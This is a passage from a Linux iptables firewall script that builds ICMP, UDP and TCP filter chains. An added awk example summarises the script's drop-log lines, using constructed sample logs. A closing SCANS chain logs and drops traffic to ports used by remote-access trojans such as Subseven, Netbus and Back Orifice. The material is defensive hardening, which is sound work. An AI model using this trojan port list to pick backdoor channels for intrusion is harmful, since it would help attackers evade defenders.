$IPTABLES -A ICMP_IN -p icmp --fragment -j DROP

#

#

#------------------------------------------

# Default for this chain: any ICMP type not explicitly accepted above is

# dropped (not RETURNed), so the caller never sees unmatched ICMP.

#

$IPTABLES -A ICMP_IN -p icmp -j DROP

#

#
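Every LOG rule in these chains carries a prefix of the form `fp=<tag> a=DROP`, which makes the kernel log easy to mine. Added example, not part of the ShareWiz script: a POSIX-sh/awk summariser that counts dropped packets per tag, source address and destination port, plus a per-source total. The log lines are constructed to match that prefix format and the `IN=`/`SRC=`/`DPT=` fields the LOG target writes; they are not real captures.

```shell
#!/bin/sh
# Added example (not the ShareWiz script): summarise "fp=... a=DROP" log
# lines by tag, source address and destination port.

# Constructed sample of kernel LOG output (not a real capture). ICMP lines
# carry TYPE/CODE instead of DPT; the last line has no firewall prefix.
SAMPLE_LOG=$(cat <<'EOF'
Mar  3 10:15:01 srv kernel: [ 120.1] fp=ICMP-IN:PING:2 a=DROP IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.10 LEN=84 TTL=52 ID=0 PROTO=ICMP TYPE=8 CODE=0
Mar  3 10:15:01 srv kernel: [ 120.2] fp=ICMP-IN:PING:2 a=DROP IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.10 LEN=84 TTL=52 ID=0 PROTO=ICMP TYPE=8 CODE=0
Mar  3 10:15:02 srv kernel: [ 121.0] fp=ICMP-IN:PING:2 a=DROP IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.10 LEN=84 TTL=52 ID=0 PROTO=ICMP TYPE=8 CODE=0
Mar  3 10:15:05 srv kernel: [ 124.3] fp=IP_SPOOF:A a=DROP IN=eth0 OUT= SRC=10.1.2.3 DST=203.0.113.10 LEN=60 TTL=64 ID=0 DF PROTO=TCP SPT=44444 DPT=22 SYN
Mar  3 10:15:06 srv kernel: [ 125.3] fp=IP_SPOOF:A a=DROP IN=eth0 OUT= SRC=10.1.2.3 DST=203.0.113.10 LEN=60 TTL=64 ID=0 DF PROTO=TCP SPT=44445 DPT=22 SYN
Mar  3 10:15:09 srv kernel: [ 128.7] fp=UDP-IN:rwho a=DROP IN=eth0 OUT= SRC=192.0.2.9 DST=203.0.113.10 LEN=78 TTL=60 ID=0 PROTO=UDP SPT=513 DPT=513
Mar  3 10:15:10 srv kernel: [ 129.0] unrelated message without a firewall prefix
EOF
)

# summarize_drops: stdin -> "count tag src dport" lines, most frequent first
# (dport is "-" where the line has no DPT=, e.g. ICMP). Lines without an
# fp= tag are ignored.
summarize_drops() {
    awk '
    {
        fp = ""; src = ""; dpt = "-"
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^fp=/)  fp  = substr($i, 4)
            if ($i ~ /^SRC=/) src = substr($i, 5)
            if ($i ~ /^DPT=/) dpt = substr($i, 5)
        }
        if (fp != "" && src != "") n[fp " " src " " dpt]++
    }
    END { for (k in n) print n[k], k }' | sort -k1,1nr -k2,2
}

# drops_from ADDR: total firewall-dropped packets logged from one source.
drops_from() {
    awk -v want="SRC=$1" '
    {
        f = 0; s = 0
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^fp=/) f = 1
            if ($i == want) s = 1
        }
        if (f && s) c++
    }
    END { print c + 0 }'
}

printf '%s\n' "$SAMPLE_LOG" | summarize_drops
printf '%s\n' "$SAMPLE_LOG" | drops_from 10.1.2.3
```

On a live system feed it `journalctl -k` or `/var/log/kern.log` instead of the sample; because the tags are fixed strings the same awk works across every chain in this script, and a tag that suddenly dominates (IP_SPOOF, Smurf, PING-death) is the first thing to look at after the rules are reloaded.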

#*********************************************************

# Create a chain to filter outgoing ICMP packets

# This chain is for outbound (to the Internet) icmp packets only.

#

#

#------------------------------------------

# Answer ping requests / originate pings.

#

# No rate limit is applied outbound: when allowed the packets are accepted,

# otherwise they are logged (rate-limited) and dropped.

#

# Note: a reply to an inbound echo-request is ESTABLISHED under conntrack,

# never NEW, so the echo-reply rule below only matches replies for which

# no request was tracked.

#

if [ $ALLOW_PING_OUT -eq 1 ]

then

$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-reply -m conntrack --ctstate NEW -j ACCEPT

else

$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:PING:1 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-reply -j DROP

fi

#

if [ $ALLOW_PING_OUT -eq 1 ]

then

$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-request -m conntrack --ctstate NEW -j ACCEPT

else

$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:PING:2 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-request -j DROP

fi

#

#

#------------------------------------------

# Time Exceeded

# Type 11 (Time Exceeded) is the only one accepted that would

# not already be covered by the established connection rule.

# Applied to OUTPUT on the external interface.

#

if [ $ALLOW_TRACEROUTE_OUT -eq 1 ]

then

$IPTABLES -A ICMP_OUT -p icmp --icmp-type 11 -j ACCEPT

else

$IPTABLES -A ICMP_OUT -p icmp --icmp-type 11 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:time:1 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type 11 -j DROP

fi

#

if [ $ALLOW_TRACEROUTE_OUT -eq 1 ]

then

$IPTABLES -A ICMP_OUT -p icmp --icmp-type 30 -j ACCEPT

else

$IPTABLES -A ICMP_OUT -p icmp --icmp-type 30 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:trace a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type 30 -j DROP

fi

#

#------------------------------------------

# Block ICMP-Redirects (Should already be caught by sysctl-options, if enabled)

#

$IPTABLES -A ICMP_OUT -p icmp --icmp-type redirect -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:redirect a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type redirect -j DROP

#

#

#------------------------------------------

# Block ICMP-TTL-Expired (type 11, codes 0 and 1). Both are already matched by the plain "--icmp-type 11" rules above (accepted or dropped depending on $ALLOW_TRACEROUTE_OUT), so these never fire; kept for completeness.

#

$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-transit -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ttl:1 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-transit -j DROP

$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-reassembly -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ttl:2 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-reassembly -j DROP

#

#

#------------------------------------------

# Block ICMP-Parameter-Problem

#

$IPTABLES -A ICMP_OUT -p icmp --icmp-type parameter-problem -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:params a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type parameter-problem -j DROP

#

#

#------------------------------------------

# Block ICMP-Timestamp (used for remote clock and OS fingerprinting). There is no sysctl to disable timestamp replies, so it has to be filtered here.

#

$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ts:1 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-request -j DROP

$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ts:2 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-reply -j DROP

#

#

#------------------------------------------

# Block ICMP-address-mask (can help to prevent OS-fingerprinting)

#

$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:addr:1 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-request -j DROP

$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:addr:2 a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-reply -j DROP

#

#

#------------------------------------------

# ICMP packets should fit in a Layer 2 frame, thus they should

# never be fragmented. Fragmented ICMP packets are a typical sign

# of a denial of service attack.

#

$IPTABLES -A ICMP_OUT -p icmp --fragment -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:frag a=DROP "

$IPTABLES -A ICMP_OUT -p icmp --fragment -j DROP

#

#

#------------------------------------------

# Default for this chain: any ICMP type not explicitly accepted above is

# dropped (not RETURNed), so the caller never sees unmatched ICMP.

#

$IPTABLES -A ICMP_OUT -p icmp -j DROP

#

#

#*********************************************************

# Create a chain to filter UDP packets

# Applied to INPUT on the external or Internet interface.

#

#

#------------------------------------------

# Dynamic Address

#

# If this host gets its address by DHCP, the initial request is a

# broadcast and the server's reply does not match the outbound packet in

# conntrack, so the reply direction is allowed explicitly here: the server

# sends from UDP port 67 to the client's port 68.

#

# (68 -> 67 is the client-to-server direction; only a DHCP server running

# on this host would need that accepted inbound.)

#

# If you receive your dynamic address by other means, leave this off.

#

if [ $ALLOW_DHCP_BROADCAST_IN -eq 1 ]

then

$IPTABLES -A UDP_IN -p udp --sport 67 --dport 68 -j ACCEPT

fi

#

#

#------------------------------------------

# Allow specific inbound UDP services

#

if [ $ALLOW_CUPS_IN -eq 1 ]

then

$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 631 -j ACCEPT # Printing CUPS

fi

#

# Allow DNS

#

if [ $ALLOW_DNS_IN -eq 1 ]

then

$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 53 -j ACCEPT

fi

#

#

#

# Allow NFS

#

if [ $ALLOW_NFS_IN -eq 1 ]

then

$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 2049 -j ACCEPT # NFS

fi

#

#

# Allow NTP

#

if [ $DO_QUICK_NTP -ne 0 ]

then

if [ $ALLOW_NTP_IN -eq 1 ]

then

$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 123 -j ACCEPT

fi

fi

#

# Allow this host to be traced: inbound UDP probes to the traceroute port

# range are accepted so the kernel answers the final hop with ICMP

# port-unreachable. Replies to this host's own outbound traceroute are ICMP

# time-exceeded and are handled in ICMP_IN, so this is gated on

# $ALLOW_TRACEROUTE_IN rather than $ALLOW_TRACEROUTE_OUT.

#

if [ $ALLOW_TRACEROUTE_IN -eq 1 ]

then

$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --sport $PORTS_TRACEROUTE_SRC --dport $PORTS_TRACEROUTE_DEST -j ACCEPT

fi

#

#

#------------------------------------------

# Silently drop RIP (UDP 520) from neighbouring routers: logging it would be far too noisy.

#

$IPTABLES -A UDP_IN -p udp --dport 520 -m conntrack --ctstate NEW -j DROP

#

#

#------------------------------------------

# Block DDOS - Fraggle

#

$IPTABLES -A UDP_IN -p udp -m pkttype --pkt-type broadcast -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:Fraggle a=DROP "

$IPTABLES -A UDP_IN -p udp -m pkttype --pkt-type broadcast -j DROP

#

#

#------------------------------------------

# Block DOS - Teardrop

#

$IPTABLES -A UDP_IN -p udp --fragment -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:Teardrop a=DROP "

$IPTABLES -A UDP_IN -p udp --fragment -j DROP

#

#

#------------------------------------------

# Port 0 fingerprint attempt

#

$IPTABLES -A UDP_IN -p udp --dport 0 -m limit --limit 1/h --limit-burst 1 -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:finger:0 a=DROP "

$IPTABLES -A UDP_IN -p udp --dport 0 -j DROP

#

#

#------------------------------------------

# Drop the rwho port (513 udp)

#

$IPTABLES -A UDP_IN -p udp ! -i lo --destination-port 513 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:rwho a=DROP "

$IPTABLES -A UDP_IN -p udp ! -i lo --destination-port 513 -m comment --comment "Block rwho port" -j DROP

#

#

#------------------------------------------

# Separate logging of special portscans/connection attempts

#

# Port Scanners

#

if [ $DO_LOG_SCANS -eq 1 ]

then

$IPTABLES -A UDP_IN -i $INET_IFACE -j SCANS

fi

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A UDP_IN -p udp -j RETURN

#

#

#*********************************************************

# Create a chain to filter outgoing UDP packets

# This chain is for outbound (to the Internet) udp packets only.

#

#

#------------------------------------------

#

# Allow printing using CUPS

#

if [ $ALLOW_CUPS_OUT -eq 1 ]

then

$IPTABLES -A UDP_OUT -p udp --dport 631 -m conntrack --ctstate NEW -j ACCEPT # Printing CUPS

fi

#

# Allow DNS

#

if [ $ALLOW_DNS_OUT -eq 1 ]

then

$IPTABLES -A UDP_OUT -p udp --dport 53 -m conntrack --ctstate NEW -j ACCEPT # DNS

fi

#

#

# Allow outbound NTP (UDP 123) so the clock can be set from an NTP server

#

if [ $ALLOW_NTP_OUT -eq 1 ]

then

$IPTABLES -A UDP_OUT -p udp --dport 123 -m conntrack --ctstate NEW -j ACCEPT

fi

#

#

# Allow TRACEROUTE

#

if [ $ALLOW_TRACEROUTE_OUT -eq 1 ]

then

$IPTABLES -A UDP_OUT -p udp --sport $PORTS_TRACEROUTE_SRC --dport $PORTS_TRACEROUTE_DEST -m conntrack --ctstate NEW -j ACCEPT

fi

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A UDP_OUT -p udp -j RETURN

#

#

#*********************************************************

# Create a chain to filter incoming TCP packets

# Applied to INPUT on the external or Internet interface.

#

#

#------------------------------------------

# Ident - reject Ident immediately (REJECT is not silent; DROP would be)

# Mail and IRC servers probe port 113 before accepting our connection,

# and a DROP makes them wait for a timeout first. tcp-reset is the more

# natural answer for a TCP port; icmp-port-unreachable works as well.

#

#$IPTABLES -A TCP_IN -p tcp -m tcp --dport 113 -j REJECT --reject-with tcp-reset

$IPTABLES -A TCP_IN -p tcp --dport 113 -j REJECT --reject-with icmp-port-unreachable

#

#

#------------------------------------------

# DHCP is UDP only (RFC 2131), so a TCP 68->67 rule can never match real

# DHCP traffic; it is disabled here and the UDP_IN rule covers DHCP.

#

#if [ $ALLOW_DHCP_BROADCAST_IN -eq 1 ]

#then

#$IPTABLES -A TCP_IN -p tcp --sport 68 --dport 67 -j ACCEPT

#fi

#

#

#------------------------------------------

# Public services running ON Server:

#

# Allow printing using CUPS

#

if [ $ALLOW_CUPS_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 631 -j ACCEPT # Printing CUPS

fi

#

# Allow DNS

#

if [ $ALLOW_DNS_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 53 -j ACCEPT # DNS

fi

#

# Allow FTP

#

if [ $ALLOW_FTP_IN -eq 1 ]

then

# Passive-mode FTP: after the control connection on port 21 the client

# opens a second connection to a server-chosen port above 1024, which

# these rules would treat as NEW and refuse. Load the FTP conntrack helper

# so that data connection is classified RELATED: nf_conntrack_ftp

# (ip_conntrack_ftp on old 2.6 kernels), listed in /etc/modules so it

# loads at boot. On kernels 4.7 and later automatic helper assignment is

# off by default, so the helper must also be attached to port 21 traffic

# with a "-t raw ... -p tcp --dport 21 -j CT --helper ftp" rule.

#

# The helper cannot parse an encrypted (FTPS) control channel. Active-mode

# data connections originate from this server's port 20 outbound, so the

# inbound --dport 20 rule below is only needed if something listens there.

#

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 20 -j ACCEPT # ftp-data

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 21 -j ACCEPT # ftp

fi

#

# Allow HTTP

#

if [ $ALLOW_HTTP_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 80 -j ACCEPT # http

fi

#

# Allow HTTPS

#

if [ $ALLOW_HTTPS_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 443 -j ACCEPT # https

fi

#

# Allow IMAP

#

if [ $ALLOW_IMAP_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 143 -j ACCEPT # imap

fi

#

# Allow MySQL

#

if [ $ALLOW_MYSQL_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 3306 -j ACCEPT # MySQL

fi

#

# Allow NFS

#

if [ $ALLOW_NFS_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 2049 -j ACCEPT # NFS

fi

#

# Allow POP3

#

if [ $ALLOW_POP3_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 110 -j ACCEPT # POP-3

fi

#

# Allow SMTP

#

if [ $ALLOW_SMTP_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 25 -j ACCEPT # smtp

fi

#

# Allow SSH

#

if [ $ALLOW_SSH_IN -eq 1 ]

then

# Optional brute-force limiter (disabled): allow three new port 22

# connections from any one source address within 60 seconds; the fourth

# and later are logged and dropped until that source has been quiet for

# 60 seconds.

#

# --rttl also requires the TTL to match the recorded entry, so a spoofed

# source cannot easily lock a legitimate address out.

#

# Established SSH sessions are unaffected (only --ctstate NEW is matched),

# and a WHITELIST_SSH chain can exempt trusted sources. The tracked

# sources can be inspected in /proc/net/xt_recent/SSH

# (/proc/net/ipt_recent/SSH on older kernels).

#

# With the four rules below commented out, port 22 is simply accepted.

#

#$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --set --name SSH

##$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -j WHITELIST_SSH

#$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG --log-prefix "fp=SSH:Brute a=DROP "

#$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -j ACCEPT

fi

#

if [ $ALLOW_SQUID_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 3128 -j ACCEPT # SQUID proxy

fi

#

if [ $ALLOW_TELNET_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 23 -j ACCEPT # telnet (cleartext; keep disabled unless unavoidable)

fi

#

if [ $ALLOW_XWINDOWS_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 6000:6009 -j ACCEPT # X11 displays :0 to :9 (unencrypted; prefer ssh -X)

fi

#

if [ $ALLOW_XWINDOWS_FONTSERVER_IN -eq 1 ]

then

$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 7100 -j ACCEPT # X font server (xfs)

fi

#

#

#------------------------------------------

# Separate logging of special portscans/connection attempts

#

# Port Scanners

#

if [ $DO_LOG_SCANS -eq 1 ]

then

$IPTABLES -A TCP_IN -i $INET_IFACE -j SCANS

fi

#

#

#------------------------------------------

# Example: only accept TCP port 22 from one source MAC address. Only

# meaningful on a directly attached LAN segment; a MAC address does not

# survive a router hop, so this is no protection against Internet sources.

# iptables -A INPUT -p tcp --destination-port 22 -m mac --mac-source 00:0F:EA:91:04:07 -j ACCEPT

#

#

#------------------------------------------

# Allow unprivileged ports

#

##$IPTABLES -A TCP_IN -p tcp -m tcp --dport $PORTS_UNPRIV -m state --state RELATED -j ACCEPT

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A TCP_IN -p tcp -j RETURN

#

#

#*********************************************************

# Create a chain to filter outgoing TCP packets

# Applied to OUTPUT on the external or Internet interface.

#

#

#------------------------------------------

# Ident - reject outbound ident (113) responses as well.

# REJECT rather than DROP so the remote side gets an immediate answer

# instead of waiting for a timeout.

#

#$IPTABLES -A TCP_OUT -p tcp -o $INET_IFACE --sport 113 -j REJECT --reject-with tcp-reset

$IPTABLES -A TCP_OUT -p tcp -o $INET_IFACE --sport 113 -j REJECT --reject-with icmp-port-unreachable

#

#

#------------------------------------------

# Public services running ON Server

#

# Allow printing using CUPS

#

if [ $ALLOW_CUPS_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 631 -j ACCEPT # Printing CUPS

fi

#

# Allow DNS

#

if [ $ALLOW_DNS_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 53 -j ACCEPT # DNS

fi

#

# Allow FTP

#

if [ $ALLOW_FTP_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 20 -j ACCEPT # ftp-data

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 21 -j ACCEPT # ftp

fi

#

# Allow HTTP

#

if [ $ALLOW_HTTP_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 80 -j ACCEPT # http

fi

#

# Allow HTTPS

#

if [ $ALLOW_HTTPS_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 443 -j ACCEPT # https

fi

#

# Allow IMAP

#

if [ $ALLOW_IMAP_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 143 -j ACCEPT # imap

fi

#

# Allow MySQL

#

if [ $ALLOW_MYSQL_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 3306 -j ACCEPT # MySQL

fi

#

# Allow NFS

#

if [ $ALLOW_NFS_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 2049 -j ACCEPT # NFS

fi

#

# Allow POP3

#

if [ $ALLOW_POP3_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 110 -j ACCEPT #POP-3

fi

#

# Allow SMTP

#

if [ $ALLOW_SMTP_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 25 -j ACCEPT # smtp

fi

#

# Allow outgoing SMTPS (implicit TLS on 465). Prefer this to the plain SMTP rule above: leave ALLOW_SMTP_OUT=0 unless this host must relay on port 25.

#

if [ $ALLOW_SMTPS_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 465 -j ACCEPT #smtps

fi

#

# Allow SSH

#

if [ $ALLOW_SSH_OUT -eq 1 ]

then

# Optional outbound limiter (disabled): the same recent-module pattern as

# in TCP_IN, applied to new SSH connections opened from this host. Without

# --rdest the recent match keys on the source address, i.e. this host

# itself, so it caps the total rate of new outbound SSH connections at

# three per 60 seconds regardless of destination (add --rdest to the

# --set and --update rules to track per destination). --rttl behaves as

# described for the inbound rules, and established sessions are not

# affected. Useful mainly to notice a compromised host scanning for SSH.

#

#$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --set --name SSH

##$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -j WHITELIST_SSH

#$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG --log-prefix "fp=SSH:OUT:Brute a=DROP "

#$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -j ACCEPT

fi

#

# Allow Squid

#

if [ $ALLOW_SQUID_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 3128 -j ACCEPT # SQUID proxy

fi

#

# Allow Telnet

#

if [ $ALLOW_TELNET_OUT -eq 1 ]

then

$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 23 -j ACCEPT # telnet

fi

#

#

#------------------------------------------

# Allow unprivileged ports

#

##$IPTABLES -A TCP_OUT -p tcp -m tcp -o $INET_IFACE -s $INET_IP --sport $PORTS_UNPRIV -j ACCEPT

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A TCP_OUT -p tcp -j RETURN

#

#

#*********************************************************

# Create a chain to filter known SCANS

# Applied to INPUT on the external or Internet interface.

#

# Trojan portscan, special services, etc

#

#

if [ $DO_LOG_SCANS -eq 1 ]

then

#------------------------------------------

# Deepthroat scan

#

$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 6670 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Deepthroat a=DROP "

$IPTABLES -A SCANS -p tcp --dport 6670 -j DROP

#

#

#------------------------------------------

# Subseven scan

#

$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 1243 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:1 a=DROP "

$IPTABLES -A SCANS -p tcp --dport 1243 -j DROP

#

$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 1243 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:2 a=DROP "

$IPTABLES -A SCANS -p udp --dport 1243 -j DROP

#

$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 27374 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:3 a=DROP "

$IPTABLES -A SCANS -p tcp --dport 27374 -j DROP

$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 27374 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:4 a=DROP "

$IPTABLES -A SCANS -p udp --dport 27374 -j DROP

#

$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 6711:6713 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:5 a=DROP "

$IPTABLES -A SCANS -p tcp --dport 6711:6713 -j DROP

#

#

#------------------------------------------

# Netbus scan

#

$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 12345:12346 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Netbus:1 a=DROP "

$IPTABLES -A SCANS -p tcp --dport 12345:12346 -j DROP

#

$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 20034 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Netbus:2 a=DROP "

$IPTABLES -A SCANS -p tcp --dport 20034 -j DROP

#

#

#------------------------------------------

# Back Orifice scan

#

$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 31337:31338 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Back-Orifice a=DROP "

$IPTABLES -A SCANS -p udp --dport 31337:31338 -j DROP

#

#

#------------------------------------------

# X-Win scan

#

$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport $PORTS_XWIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=X-Win a=DROP "

$IPTABLES -A SCANS -p tcp --dport $PORTS_XWIN -j DROP

#

#

#------------------------------------------

# Hack'a'Tack 2000

#

$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 28431 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Hack'a'Tack-2000 a=DROP "

